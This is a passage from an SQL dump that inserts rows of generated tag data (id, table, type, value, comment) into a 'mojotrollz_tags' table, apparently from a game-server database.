4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1945, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1946, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1947, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1948, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1949, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1950, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1951, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1952, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1953, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1954, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1955, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1956, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1957, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1958, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1959, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1960, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1961, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1962, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1963, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1978, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1998, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1999, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2038, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2039, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2040, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2041, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2078, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2098, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2118, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2138, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2139, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2158, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2159, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2160, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2161, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2178, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2199, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2200, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2201, 4, 1, 70, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2201, 4, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2202, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2203, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2204, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2205, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2206, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2218, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2238, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2239, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2240, 4, 1, 70, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2240, 4, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2241, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2242, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2258, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2259, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2260, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2281, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2282, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2283, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2284, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2298, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2299, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2300, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2318, 4, 1, 70, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2318, 4, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2338, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2339, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2340, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2341, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2342, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2358, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2359, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2360, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2361, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2378, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2379, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2380, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2381, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2382, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2383, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2398, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2418, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2438, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2439, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2440, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2458, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2459, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2460, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2478, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2479, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2480, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2498, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2499, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2500, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2501, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2518, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2519, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2520, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2521, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2522, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2541, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2561, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2581, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2582, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2583, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2584, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2585, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2586, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2601, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2602, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2603, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2604, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2605, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2606, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2607, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2608, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2609, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2621, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2622, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2623, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2641, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2661, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2662, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2681, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2702, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2721, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2742, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2744, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2745, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2746, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2747, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2748, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2749, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2750, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2751, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2752, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2753, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2754, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2755, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2756, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2757, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2758, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2759, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2760, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2761, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2762, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2763, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2764, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2765, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2767, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2768, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2769, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2770, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2771, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2772, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2773, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2783, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2784, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2801, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2821, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2822, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2841, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2842, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2843, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2844, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2845, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2846, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2847, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2848, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2849, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2850, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2851, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2852, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2853, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2854, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2855, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2856, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2857, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2858, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2859, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2860, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2861, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2862, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2863, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2864, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2865, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2866, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2869, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2870, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2871, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2872, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2873, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2874, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2877, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2879, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2880, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2881, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2902, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2904, 4, 1, 90, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2904, 4, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2922, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2923, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2924, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2925, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2926, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2927, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2928, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2929, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2930, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2931, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2932, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2934, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2935, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2936, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2937, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2938, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2939, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2941, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2943, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2944, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2946, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2948, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2950, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2962, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2963, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2964, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2965, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2966, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2968, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2969, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2970, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2972, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2973, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2974, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2975, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2976, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2979, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2980, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2981, 4, 1, 1, ' 